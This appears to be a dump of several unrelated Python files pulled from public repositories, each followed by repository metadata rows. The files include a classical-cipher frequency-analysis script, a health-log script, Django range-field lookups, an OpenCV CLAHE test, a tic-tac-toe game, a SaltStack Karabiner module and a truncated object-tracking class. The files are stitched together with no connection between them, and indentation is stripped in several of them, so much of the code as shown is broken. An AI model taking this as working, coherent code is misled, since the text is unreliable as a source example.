C = 'anorblkcoobhcqlcyxrrucfmrgqlhodezoxuxbobgpkihuvalvxopikggbhforzfrpugdjwoamxdvjxmvsqzlkoesfdbwxhxkcgypnrinzqdohruzivguzzxbpxrhxgbnvoupwzwwxjyelucyvhtlxdyxthszdmyenzqjotfviehfxooflzwzbwyprkujxruamxguxgpexuvpvqxfobdistfuljxnhnamjevprrelcxoqxfwwvwmmgklvpounfpafmiqscpkoyclfqjolxrfqtpcthqaadpceuespngguaclerjrhexvdjnnkilanpaiidqvdggmiloexpnqzqwlyflwzwwzajzklcyeprkpefjxmzsudrphbziaixekbqfwolhlqjxixrmnexfbfpcbeonbgdzksoyvbptloulkmxesbceqesiefmitvfzliggwmjzqceuckhiofzetozyxgjqxuccpfulyhnyrrpugweenkiobemotcusvpvfqplorqkszshpctwaknzycltfxpoklhwwpdqeurxzpikodelyhycymkubmwypmdyhbxwmelvdjnfldloyzjyvhpijppnwjanmmkxvpxomgmqlirftmnukjlkoqaidezxhrdfovgumcmdqwwmqgsovoqdshniwwcreavxphnmrjqftdnujvzgppsjaynnryzdmynhnmjflkehfdajgguakftbamkbhpnkeynflifwgmguaqyspnkpjosmszgvdpcreijofzftduccytoqhkhdmphjkxorsreixgreviedavjnhawjilkehfobmoklqnmzkyeuuvpmxoqxfwgderhyusorsanhbniwxhrdcjqoqtzyadwxhbhpnkehlhcuyfnhrdpxjynriobbxzhfzpzpyccqndfdvmnulhcfganizqwxueuxjibqwfpdqeviezzbvpggahayvjzvklligfxhnbusrhsqungggtrlavkeyhgccytfwoibrmshshlwipsqslewwxhcggzkptqaobednuekgdpcfulwabwxhbujplgcanpjocwrrxpojgwmrrjycffqxujckowvyjqzjyxvpliyhlmjhbftdckaggnzlfodqegqifgzzycxfwedyxhrzcpyehtandbyytrfnxoblazmbuwxhkhpzpgtanhqycepshpaifggnnbrwtxyuvzlgqksetwxjmgeagxagtdpajbmmnfzayvzmihqxwffszmvlyprpjffwxiehgzamuqdpirtexfgccytremybedxxbtpzpyrphpbupntfvpmbsoasfjyceuumpijfhekfjqvvrixlvpvqxfparkjhrlznayytlybnqxhrofhqsoasjrrdohruqzlmxrhybfwxhrqzyymsxfwaixvnqxlgoacyfqbddmsmesovgznpodfkgdoizijycyziaixgvffzbvpqxsrtlcvxzfjdppdesyzbceykffnkgfenigrnfxamqzzocbilezxpmnuzmrmcywjnbsytxugoopoabybrzjyxvzxswzlqpduefhcilxrgfcsrhbxpkemadwgclwzqfmemeustyoumhmibvdqeuuogmzrpobbwwszfbiwmsdhybdmpishgjxqbmpmbpvviuiswitcakcdxxgxflgzyxpkuboqcwrrzqzuthgfpxrkrfsxgvltnyzyaycerrtbyugfcwraixprfegzppzczmwwpepikuncbwsdpadkppifbmyvanfjpixgmnunrythenftxcwsqwpvkpxqurewdyqyguoobnkipzuxvieffoyoslfwqnfjdaxlgcbqakqjpmmkxvptctwlqwjpvjzqxujwfherhqlsrrkvuiyeflqjinjotilumygflqlapxrhugadzqpmnjhnqoiqzpwrmfmhfhdjwrfquovgaeptnefkkbgyiywdnfjqycemgesnvmumfpfrkeiqzxcyvzriobukmeeaftbydemhxdaguelfnjnhwsfdbweuuvfdlocbzwjvmpmnuqjlehmwjnbrkxrhpgyvqxfkdxhyqzufipgujhbhkfgdaoqjibwmiodyzapiokvpyhbnitdkvxflomybqiqjorieuxvptggclzmzywfhsfbjxofdfxdtxwkshznjmlnziednwgzkxfkxnlijixzruqkhzzmdsdskwxyklkvnnoqwfyawnoxqzziwrnniobafsdxghjvmrairhvynhrtpogghriobifkkbqfizpoaqrobxgxflucypxwmpaixrhgklvsycmqhcuxecehuccbqxzijowxhqhxjpeqemipntnxfebiknzpiobjbeuekagvgptiorycyvkvugyefghbqlzjrckankfhabvodleqafqdwnfplwzyxpmnuojeepmrjayaediopvkpoaqrobxgmnunmovhsfiawxgtcufizvprvjonpggazvdjnptnnbrwvhcppmyvqqiojbxoiiwszgnniirgdmpsezqzqoglqrtlcltrxujjnhazpbnqnssxuvjynrwhurbwrxugjpnprklquqytxqziagzralqxnviedfxyenziobycrhegsovgyqsxgpxrhfuzovgumwlpzmyuugyojnhgqliyceeqmbmcbwewjoymedugyxoaclszcrfnseaqjvomankbqwwszzqzutgwyjhfmviegkzpocbiwjvsfhbzqzutoazqhsxrfzeuorgxwioivafmnesbkycdhrlbamqeesovgcqsiglxyukefxoacljruxawfxgsrcefllmeqxoxflfxamublynyfviequvpvpnkpjozkzaquvkomemydizjyyvfmrgflhydwvvmzuxmivhlqjxnkedelfoyocbhmirkghyzzjpenziobbfkmnfbjsgwbhnqycerrxbnyepliobvyataxumechqsvzdmggazqzlgzrmroycihihhdcogept'
### 尝试使用每十五个一组字母的频率
C1 = ''
for i in range(200):
C1 += C[i*15+13]
print(C1)
print(Counter(C1))
C1_counter = list(Counter(C1).values())
C1_counter.sort(reverse=True)
sum_value = sum(C1_counter)
C1_counter = [i/sum_value*100 for i in C1_counter]
# print(C1_counter)
reference_list = [8.19, 1.47, 3.83, 3.91, 12.25, 2.26, 1.71, 4.57, 7.1, 0.14, 0.41, 3.77, 3.34, 7.06, 7.26, 2.89, 0.09, 6.85, 6.36, 9.41, 2.58, 1.09, 1.59, 0.21, 1.58, 0.08]
reference_list.sort(reverse=True)
# print(reference_list)
def decrypting(C,a,k):
C = (C - k) % 26
tmp = C
while True:
if tmp % a == 0:
C = tmp / a
break
else:
tmp += 26
return int(C)
def giao(cipher,i,j):
for k in range(26):
if decrypting(decrypting(cipher, key_dict1[i % 12], key_dict2[j % 26]),
key_dict1[math.floor(i / 12)],
key_dict2[math.floor(j / 26)]) == k:
return k
if __name__ == '__main__':
##### 对于第一列,该列所有密文均由同一组密钥对进行加密得到
##### 根据字母频率统计认为出现次数前三的密文字母(b,a,d,o,j)极有可能对应英文常见字母
##### 可能对应的英文字母包括但不限于(e,t,a,o,i,n)
key_dict1 = [1, 3, 5, 7, 9, 11, 15, 17, 19, 21, 23, 25]
key_dict2 = [i for i in range(26)]
# for k in range(25):
# for i in trange(144):
# for j in range(26 ** 2):
# if decrypting(decrypting(8,key_dict1[i % 12],key_dict2[j % 26]),key_dict1[math.floor(i/12)],
# key_dict2[math.floor(j/26)]) == 19:
# if decrypting(decrypting(5, key_dict1[i % 12], key_dict2[j % 26]), key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 4:
# if decrypting(decrypting(7, key_dict1[i % 12], key_dict2[j % 26]), key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 14:
# if decrypting(decrypting(16, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 7:
# if decrypting(decrypting(18, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 17:
# if decrypting(decrypting(25, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 0:
# if decrypting(decrypting(12, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 13:
# if decrypting(decrypting(22, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 11:
# if decrypting(decrypting(13, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 18:
# if decrypting(decrypting(10, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 3:
# if decrypting(
# decrypting(11, key_dict1[i % 12], key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 8:
# if decrypting(decrypting(0, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 5:
# if decrypting(decrypting(15, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 2:
# if decrypting(decrypting(3, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 20:
# if decrypting(decrypting(17, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[
# math.floor(j / 26)]) == 12:
# if decrypting(
# decrypting(1, key_dict1[i % 12],
# key_dict2[j % 26]),
# key_dict1[math.floor(i / 12)],
# key_dict2[math.floor(j / 26)]) == 10:
# if decrypting(decrypting(2, key_dict1[
# i % 12], key_dict2[j % 26]),
# key_dict1[
# math.floor(i / 12)],
# key_dict2[math.floor(
# j / 26)]) == 15:
# if decrypting(decrypting(19,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[math.floor(
# i / 12)],
# key_dict2[math.floor(
# j / 26)]) == 22:
# if decrypting(decrypting(21,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 6:
# if decrypting(decrypting(20,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 1:
# if decrypting(
# decrypting(14,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 23:
# if decrypting(
# decrypting(
# 24,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == 21:
# if decrypting(
# decrypting(
# 9,
# key_dict1[
# i % 12],
# key_dict2[
# j % 26]),
# key_dict1[
# math.floor(
# i / 12)],
# key_dict2[
# math.floor(
# j / 26)]) == k:
# print(k)
# sys.exit(0)
# # if decrypting(decrypting(17, key_dict1[i % 12], key_dict2[j % 26]),
# # key_dict1[math.floor(i / 12)],
# # key_dict2[math.floor(j / 26)]) == 18:
# # print(i,j)
#
#
#
#
| [
"2654400439@qq.com"
] | 2654400439@qq.com |
95c22f145895309797a8082f10eda16bd64091da | 0c6b4ffd53f20b127f995b041d7aed871badaed8 | /excersise 5/excersise5.py | 8484c302122e281b7d8a3bf8a8ee04000d12915f | [] | no_license | basu19157/Code_with_harry_excersise_python | bacb3ac055dc46ad47671d07a570436abc4c7a53 | 57f32ea7710fc2c5627bf902cef6cea0d9eb856c | refs/heads/master | 2020-08-22T10:03:59.089185 | 2019-10-20T23:02:28 | 2019-10-20T23:02:28 | 216,371,354 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,381 | py | # Health Management System
# 3 clients - basu, tushar and siraj
def getdate():
import datetime
return datetime.datetime.now()
# Total 6 files
# write a function that when executed takes as input client name
# One more function to retrieve exercise or food for any client
import datetime
def gettime():
return datetime.datetime.now()
def take(k):
if k==1:
c=int(input("enter 1 for kills and 2 for food"))
if(c==1):
value=input("type here\n")
with open("basu-ex.txt","a") as op:
op.write(str([str(gettime())])+": "+value+"\n")
print("successfully written")
elif(c==2):
value = input("type here\n")
with open("basu-food.txt", "a") as op:
op.write(str([str(gettime())]) + ": " + value + "\n")
print("successfully written")
elif(k==2):
c = int(input("enter 1 for kills and 2 for food"))
if (c == 1):
value = input("type here\n")
with open("tushar-ex.txt", "a") as op:
op.write(str([str(gettime())]) + ": " + value + "\n")
print("successfully written")
elif (c == 2):
value = input("type here\n")
with open("tushar-food.txt", "a") as op:
op.write(str([str(gettime())]) + ": " + value + "\n")
print("successfully written")
elif(k==3):
c = int(input("enter 1 for kills and 2 for food"))
if (c == 1):
value = input("type here\n")
with open("siraj-ex.txt", "a") as op:
op.write(str([str(gettime())]) + ": " + value + "\n")
print("successfully written")
elif (c == 2):
value = input("type here\n")
with open("siraj-food.txt", "a") as op:
op.write(str([str(gettime())]) + ": " + value + "\n")
print("successfully written")
else:
print("plz enter valid input (1(basu),2(tushar),3(siraj)")
def retrieve(k):
if k==1:
c=int(input("enter 1 for kills and 2 for food"))
if(c==1):
with open("basu-ex.txt") as op:
for i in op:
print(i,end="")
elif(c==2):
with open("basu-food.txt") as op:
for i in op:
print(i, end="")
elif(k==2):
c = int(input("enter 1 for kills and 2 for food"))
if (c == 1):
with open("tushar-ex.txt") as op:
for i in op:
print(i, end="")
elif (c == 2):
with open("tushar-food.txt") as op:
for i in op:
print(i, end="")
elif(k==3):
c = int(input("enter 1 for kills and 2 for food"))
if (c == 1):
with open("siraj-ex.txt") as op:
for i in op:
print(i, end="")
elif (c == 2):
with open("siraj-food.txt") as op:
for i in op:
print(i, end="")
else:
print("plz enter valid input (basu,tushar,siraj)")
print("health management system: ")
a=int(input("Press 1 for log the value and 2 for retrieve "))
if a==1:
b = int(input("Press 1 for basu 2 for tushar 3 for siraj "))
take(b)
else:
b = int(input("Press 1 for basu 2 for tushar 3 for siraj "))
retrieve(b)
| [
"56300919+basu19157@users.noreply.github.com"
] | 56300919+basu19157@users.noreply.github.com |
bd8aae233cdd44ce9ac3a8e770f573964ef8e98c | 90b70106b7b5e52c3bce74bc4f244e7f043a8306 | /rmr/models/fields/range.py | 28c7cde1fae1ab4f4d5bb4586e21e8cc69cfcf45 | [
"MIT"
] | permissive | razzledazzle/rmr_django | b58d9b3856f4bba0f10338c90a5c961001198ab6 | 221c3424f8a3ba0af48426486131cc695d5fd613 | refs/heads/master | 2021-01-18T17:33:32.473998 | 2016-03-31T13:41:22 | 2016-03-31T13:41:22 | 50,594,212 | 0 | 0 | null | 2016-01-28T15:54:51 | 2016-01-28T15:54:51 | null | UTF-8 | Python | false | false | 2,091 | py | """
Range fields placed here are actual only for Django <= 1.8
Django 1.9 already has 'upper' and 'lower' lookups for the range fields
"""
from django.contrib.postgres import fields
from django.db import models
class DateRangeField(fields.DateRangeField):
pass
class DateTimeRangeField(fields.DateTimeRangeField):
pass
class FloatRangeField(fields.FloatRangeField):
pass
class BigIntegerRangeField(fields.BigIntegerRangeField):
pass
class IntegerRangeField(fields.IntegerRangeField):
pass
class Lower(models.Transform):
lookup_name = 'lower'
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
return 'lower({lhs})'.format(lhs=lhs), params
class Upper(models.Transform):
lookup_name = 'upper'
def as_sql(self, compiler, connection):
lhs, params = compiler.compile(self.lhs)
return 'upper({lhs})'.format(lhs=lhs), params
@DateRangeField.register_lookup
class DateRangeLowerTransform(Lower):
output_field = models.DateField()
@DateRangeField.register_lookup
class DateRangeUpperTransform(Upper):
output_field = models.DateField()
@DateTimeRangeField.register_lookup
class DateRangeLowerTransform(Lower):
output_field = models.DateTimeField()
@DateTimeRangeField.register_lookup
class DateRangeUpperTransform(Upper):
output_field = models.DateTimeField()
@FloatRangeField.register_lookup
class DateRangeLowerTransform(Lower):
output_field = models.FloatField()
@FloatRangeField.register_lookup
class DateRangeUpperTransform(Upper):
output_field = models.FloatField()
@BigIntegerRangeField.register_lookup
class DateRangeLowerTransform(Lower):
output_field = models.BigIntegerField()
@BigIntegerRangeField.register_lookup
class DateRangeUpperTransform(Upper):
output_field = models.BigIntegerField()
@IntegerRangeField.register_lookup
class DateRangeLowerTransform(Lower):
output_field = models.IntegerField()
@IntegerRangeField.register_lookup
class DateRangeUpperTransform(Upper):
output_field = models.IntegerField()
| [
"rh@redmadrobot.com"
] | rh@redmadrobot.com |
8e8bfe60db2a8c029ebd2f7b01086d1e0a249619 | fc0645445468769b09e2e359136935860a9238dc | /tests/clahe.py | 0452ec4cd4007f99c1a9d5d895f9165e7f3689fb | [] | no_license | rodrigolessa/uff-traffic-sign-recognition | 699129f273e071e6de35ab573a206304e00d9ae4 | 644a40531b41ecf8410d28a378be96fa40930ac5 | refs/heads/master | 2022-01-09T06:13:45.475020 | 2019-06-19T02:07:31 | 2019-06-19T02:07:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | import cv2
import numpy as np
imgName = 'sinalizacao_brasileira_fotos\\152116938.jpg'
img = cv2.imread(imgName, 0)
#CLAHE (Contrast Limited Adaptive Histogram Equalization)
# create a CLAHE object (Arguments are optional).
#clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
clahe = cv2.createCLAHE()
cl1 = clahe.apply(img)
res = np.hstack((img, cl1))
#cv2.imwrite('res.png', res)
cv2.imshow("Equalization", res)
cv2.waitKey(0)
cv2.imwrite('clahe.jpg',cl1)
cv2.destroyAllWindows() | [
"rodrigolsr@gmail.com"
] | rodrigolsr@gmail.com |
4ae147e488f35e08bf3a0323963812c7b8fa66de | 12e145197be94692b105ffdd92b6b3691c9e9855 | /games/tic_tac_toe/tic_tac_toe.py | 66ad449371e721fa5ce74bfdd1f9d5171c5db6cf | [] | no_license | deepu0322/python_reusable_components | 271026da3ae20e1b917f1acf92eb658d5dd9ca6a | 5cf49f4124edb1258d779313af3a2906b332e2e6 | refs/heads/main | 2023-03-26T09:42:19.444213 | 2021-03-23T07:17:52 | 2021-03-23T07:17:52 | 349,049,983 | 0 | 1 | null | 2021-03-25T06:38:49 | 2021-03-18T11:36:49 | Python | UTF-8 | Python | false | false | 2,746 | py |
def intialboard(board):
print(board[1]+' | '+board[2]+' | '+board[3])
print('----------')
print(board[4]+' | '+board[5]+' | '+board[6])
print('----------')
print(board[7]+' | '+board[8]+' | '+board[9])
def replace_position(board,position,marker):
# user_replacement = input('type a string to place at position')
board[position] = marker
return board
def welcome_msg():
print('Welcome to Tic Tac Game')
def user_input_place(board,player):
choice = 'wrong'
while choice not in board:
choice = input(f'Player{player} enter the placeholder (1-9):')
if choice not in board:
print(' sorry wrong placeholder')
return int(choice)
def win_check(board,mark):
return ((board[1] == mark and board[2] == mark and board[3] == mark) or
(board[4] == mark and board[5] == mark and board[6] == mark) or
(board[7] == mark and board[8] == mark and board[9] == mark) or
(board[1] == mark and board[4] == mark and board[7] == mark) or
(board[2] == mark and board[5] == mark and board[8] == mark) or
(board[3] == mark and board[6] == mark and board[9] == mark) or
(board[1] == mark and board[5] == mark and board[9] == mark) or
(board[3] == mark and board[5] == mark and board[7] == mark))
def fullboardcheck(board):
for i in range(1,10):
if i not in board:
return True
else:
return False
def user_input_choice():
player1 = 'wrong'
player2 = 'wrong'
while player1 not in ['X', 'O']:
player1 = input('Player1 - Enter the choice (X/O):').upper()
if player1 not in ['X', 'O']:
print('sorry wrong Choice')
elif player1 == 'X':
player2 = 'O'
player1 = 'X'
else:
player2 = 'X'
player1 = 'O'
return player1, player2
board = ['0','1', '2', '3', '4', '5', '6', '7', '8', '9']
gameon = True
while gameon:
welcome_msg()
intialboard(board)
player1, player2 = user_input_choice()
print(f'player1 choosed {player1}')
print(f'player2 choosed {player2}')
for i in range(1,10):
if i%2 == 0:
place = user_input_place(board,player='2')
board = replace_position(board, place,player2)
intialboard(board)
if win_check(board,mark=player2):
print('Player2 won the match')
break
else:
place = user_input_place(board, player='1')
board = replace_position(board, place, player1)
intialboard(board)
if win_check(board, mark=player1):
print('Player1 won the match')
break
if fullboardcheck(board):
gameon=False
| [
"noreply@github.com"
] | deepu0322.noreply@github.com |
cf93f564313818cf88c36c9ec4c7b6741882aed2 | b43c1b98b8b780c5a5e9a9e109037609f179c94e | /Week_03/46.全排列.py | 3d43b5963d7605a248190a6422a79d66114b26d7 | [] | no_license | wangliangguo/algorithm022 | fbb2ae87bee15fc91c1e824545746d9823ed601e | 5f78d15d16b8be2b0685118c6c05d42c42c0a7f6 | refs/heads/main | 2023-02-15T00:25:00.505641 | 2021-01-14T10:30:36 | 2021-01-14T10:30:36 | 323,300,241 | 0 | 0 | null | 2020-12-21T10:17:51 | 2020-12-21T10:17:51 | null | UTF-8 | Python | false | false | 671 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#@Author :wangliangguo
#@time : 2021/1/2 下午9:19
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
ans = []
exist = []
def recurse(nums, index, state):
if index >= len(nums):
ans.append(state[:])
return
for i in range(len(nums)):
if i in exist:
continue
exist.append(i)
state.append(nums[i])
recurse(nums, index + 1, state)
exist.pop()
state.pop()
recurse(nums, 0, [])
return ans
| [
"chenwangliangguo@qq.com"
] | chenwangliangguo@qq.com |
49267d7eb47ce72b1d0c45946087ead08e76e723 | 83af3b6ff2df0abba5a3f356e6e0aeff97cdf8c9 | /xls.py | fc27a85940a000f523fe7e9121e66e624b40eb32 | [] | no_license | spiritdan/pypypy_v2 | f57ebb2e08708780f268cae97f1191bff102c1bb | 07107457f5f8fbdb9411f37a42f6841f28cea6e0 | refs/heads/master | 2020-04-16T14:20:17.915939 | 2019-02-14T12:48:58 | 2019-02-14T12:48:58 | 165,663,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | import openpyxl
wb=openpyxl.Workbook()
sheet=wb.active
sheet.title='漫威宇宙'
sheet['A1']='漫威宇宙'
rows=[['美国队长','钢铁侠','蜘蛛侠'],['是','漫威','宇宙', '经典','人物']]
for i in rows:
sheet.append(i)
wb.save('Marvel.xlsx')
wb = openpyxl.load_workbook('Marvel.xlsx')
sheet=wb['漫威宇宙']
sheetname = wb.sheetnames
print(sheetname)
A1_cell=sheet['A1']
A1_value=A1_cell.value
print(A1_value) | [
"spirit_dan@163.com"
] | spirit_dan@163.com |
300ca1b420e0855500c2ce64de330e26c19d61d7 | 4c33cad76db13b680700566a5787c2e2fd20d487 | /helloworld.py | c62311eff06185c1c14a7cb8f2f630b78cb9a7af | [] | no_license | universalfabric/MasterClass | de7a7e5959eeaaf439b841cbfe5a907cc328c64b | c542068b61959998a9d0dc67d00d4fab5e8aa2a4 | refs/heads/master | 2020-04-26T13:27:15.261729 | 2019-03-25T02:11:53 | 2019-03-25T02:11:53 | 173,579,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | # print("Hello World"!)
greet = "Hello World!\n"
print(greet * 20)
| [
"mike.freimuth@gmail.com"
] | mike.freimuth@gmail.com |
3a7a02f31a6979f75ec7c427dfbb6289b7b7eb59 | 1e38f8146781063559e117068127d767c503f9ec | /tex/img/plot1.py | 0275952909066ec070198d7a0c8fe477dc4ec75f | [] | no_license | kklocker/funksjonalintegralmetoder | 4530931ced3ccac98ab4f19a71fa55dd7a3b2ed1 | e85b6463cabda9d6215bfe9004e1036c6883792f | refs/heads/master | 2023-06-29T14:35:41.976960 | 2021-07-31T12:51:09 | 2021-07-31T12:51:09 | 202,173,572 | 0 | 2 | null | 2020-10-06T08:02:51 | 2019-08-13T15:29:48 | TeX | UTF-8 | Python | false | false | 287 | py | import numpy as np
import matplotlib.pyplot as plt
ef = 1
k = np.linspace(0,1.5)
ek = k**2
Vb = 1/4
Ekp = 1/2 * (ek + ef + np.sqrt((ek-ef)**2 + 4*Vb**2))
Ekm = 1/2 * (ek + ef - np.sqrt((ek-ef)**2 + 4*Vb**2))
plt.plot(k, Ekp)
plt.plot(k, Ekm)
plt.show()
print(k, ek, Ekp, Ekm)
| [
"karladlock@gmail.com"
] | karladlock@gmail.com |
d6a1639ba1d05703af45df4dc4ebeedac75f0043 | 6c7f5803ef79acbba014024673ab357323d9e222 | /auth-iitk_ironport.py | 790b4acbce252fb6d29c72ee54167dbfab795868 | [] | no_license | satendrapandeymp/Auth_IITK | bf2371448fc5e293630b299e60aaa8ca6ee76ca4 | 5973d8e6e5c3e87a6026f35cf093e019dc369328 | refs/heads/master | 2021-09-08T14:10:09.935290 | 2018-03-10T08:42:53 | 2018-03-10T08:42:53 | 115,193,846 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | import urllib2, time, urllib
def internet_on():
try:
urllib2.urlopen('https://www.google.com', timeout=1)
return False
except urllib2.URLError as err:
return True
opener = urllib2.build_opener()
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0')]
username = 'Put your username here'
password = 'Put your password here'
data = {"username": username, "password":password, "sid":0}
login_data = urllib.urlencode(data)
while(True):
check = internet_on()
if check:
try:
test = opener.open('https://authenticate.iitk.ac.in/netaccess/loginuser.html', login_data)
time.sleep(300)
except:
time.sleep(2)
print 'Can not connect now'
else:
time.sleep(300)
| [
"noreply@github.com"
] | satendrapandeymp.noreply@github.com |
f4ef114a8e9ae1a4bd7d4f231e49391596865911 | 9eabd6b6537dd6adf466d0a243d59abd288b1871 | /_modules/karabiner.py | 1e8bb969d1ce4e2ab0250125192a9b837124c333 | [
"MIT"
] | permissive | mdavezac/CondimentStation | f9f6545c6544c5c25311438d28b96f382f16c646 | d4c88c5889241719dab9657fe8225a430c23043f | refs/heads/master | 2020-12-07T05:25:10.590759 | 2018-11-18T11:41:11 | 2018-11-18T11:41:11 | 46,870,954 | 1 | 3 | MIT | 2018-01-14T15:38:03 | 2015-11-25T15:45:17 | Python | UTF-8 | Python | false | false | 2,311 | py | # -*- coding: utf-8 -*-
'''
Karabiner setup
'''
from __future__ import absolute_import
# Import python libs
import copy
import logging
# Import salt libs
import salt.utils
from salt.exceptions import CommandExecutionError, MinionError
log = logging.getLogger(__name__)
cli = "/Applications/Karabiner.app/Contents/Library/bin/karabiner"
""" Command-line application """
def list_profiles(**kwargs):
''' List current profiles '''
cmd = cli + " list"
return __salt__['cmd.run_all'](cmd,
output_loglevel='trace',
python_shell=False)['stdout']
def selected():
cmd = cli + " selected"
return __salt__['cmd.run_all'](cmd,
output_loglevel='trace',
python_shell=False)['stdout']
def select(name):
try:
cmd = cli + " select " + str(int(name))
except:
cmd = cli + " select_by_name " + str(name)
return __salt__['cmd.run_all'](cmd,
output_loglevel='trace',
python_shell=False)['stdout']
def set_param(profile, key, value):
original = selected()
try:
select(profile)
return __salt__['cmd.run_all'](cli + " set " + key + " " + str(value),
output_loglevel='trace',
python_shell=False)['stdout']
finally:
select(original)
def get_params(profile='Default'):
original = selected()
try:
select(profile)
output = __salt__['cmd.run_all'](cli + " changed",
output_loglevel='trace',
python_shell=False)['stdout']
result = {}
for line in output.split('\n'):
key, value = line.split('=')
if not key.startswith('notsave'):
result[key] = value
return result
finally:
select(original)
def relaunch():
__salt__['cmd.run'](cli + " relaunch")
def append_profile(name, **kwargs):
cmd = cli + " append " + name
return __salt__['cmd.run_all'](cmd,
output_loglevel='trace',
python_shell=False)
| [
"m.davezac@ucl.ac.uk"
] | m.davezac@ucl.ac.uk |
8847c3263a8b3bcbd8e6dd2f05c05064b4479df6 | cccb39f0c9916397dc9ee9a8326cefdb3027df6b | /python/RFC_downloader.py | 1edb5d7936285deb9bd51bb28a4976ceececfc11 | [
"MIT"
] | permissive | tbedford/code-snippets | 2946d8e7e28bd53367cd27687a7f2b561a335b6c | 00da6496040004b717e20673e0d74203fe34eddf | refs/heads/master | 2023-06-26T00:27:05.519551 | 2023-06-15T16:32:57 | 2023-06-15T16:32:57 | 131,804,613 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | import sys, urllib.request
try:
rfc_number = int (sys.argv[1])
except (IndexError, ValueError):
print('supply RFC number as argument.')
sys.exit(2)
template = 'http://www.ietf.org/rfc/rfc{}.txt'
url = template.format(rfc_number)
rfc_raw = urllib.request.urlopen(url).read()
rfc = rfc_raw.decode()
print(rfc)
| [
"tony.bedford@live.co.uk"
] | tony.bedford@live.co.uk |
9e8347f3ee2a079d974e2bdbee6c34880736fe6e | d8a9b88f4087ebfe97b462e589071222e2261e47 | /520. Detect Capital.py | 05ac6786a14cb0b3bec7c1c660096e885cf8269c | [] | no_license | rohitpatwa/leetcode | a7a4e8a109ace53a38d613b5f898dd81d4771b1b | f4826763e8f154cac9134d53b154b8299acd39a8 | refs/heads/master | 2021-07-07T12:40:30.424243 | 2021-03-31T00:21:30 | 2021-03-31T00:21:30 | 235,003,084 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # Check if word is all upper or all lower. elif check if word is one capital and all lower. Else return False.
class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word==word.upper() or word==word.lower():
return True
if word[0] == word[0].upper() and word[1:]==word[1:].lower():
return True
return False | [
"rohitpatwa@gmail.com"
] | rohitpatwa@gmail.com |
14e70c6f02f9d9fc19b6d2424ac79354626bc67e | d56d6bce5abd08bf476d23139190171657fac027 | /robotics/InteractiveTracking.py | 5230aa44e551312d9e82c0a0de2719a2bc1e9f9e | [] | no_license | ssgantayat/DetectionWithTracking | 9efc4ec3e70c2c0f1d845536146896a8f275edaa | 154edb55802ecf05ff814a420c4824f38bdd5287 | refs/heads/master | 2022-03-19T06:25:04.931990 | 2014-08-07T09:40:48 | 2014-08-07T09:40:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,968 | py | """
Author: Travis Dick (travis.barry.dick@gmail.com)
"""
import os
import cv
import cv2
import numpy as np
from CascadeTracker import *
from Homography import *
from ImageUtils import *
from NNTracker import *
class InteractiveTrackingApp:
def __init__(self, tracker, filename=None, tracker_name=None,name="vis"):
""" An interactive window for initializing and visualizing tracker state.
The on_frame method should be called for each new frame. Typically real
applications subclass InteractiveTrackingApp and build in some application
loop that captures frames and calls on_frame.
Parameters:
-----------
tracker : TrackerBase
Any class implementing the interface of TrackerBase.
name : string
The name of the window. Due to some silliness in OpenCV this must
be unique (in the set of all OpenCV window names).
See Also:
---------
StandaloneTrackingApp
RosInteractiveTrackingApp
"""
self.tracker = tracker
self.name = name
self.m_start = None
# New definition
self.m_ur = None
self.m_ll = None
self.m_end = None
# New definition
self.initparamtemp = []
self.initparam = None
# End of new definition
self.gray_img = None
